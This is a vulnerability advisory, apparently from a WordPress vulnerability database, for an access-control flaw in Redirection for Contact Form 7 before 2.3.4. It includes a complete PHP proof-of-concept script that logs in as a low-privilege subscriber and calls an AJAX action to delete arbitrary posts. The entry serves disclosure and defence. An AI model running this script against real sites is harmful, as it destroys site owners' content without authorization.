WordPress Plugin Vulnerabilities
Redirection for Contact Form 7 < 2.3.4 - Authenticated Arbitrary Post Deletion
Description
In the plugin, any authenticated user, such as a subscriber, could use the delete_action_post AJAX action to delete any post on a target site.
Proof of Concept
<?php // Settings $wp_url = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; // Log in as subscriber $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); // Set redirect url $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'action' => 'wpcf7r_delete_action', 'data[0][post_id]' => '1' ]); $output = curl_exec($ch); curl_close($ch); print_r($output);
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-20 (about 3 years ago)
Added
2021-04-20 (about 3 years ago)
Last Updated
2021-04-21 (about 3 years ago)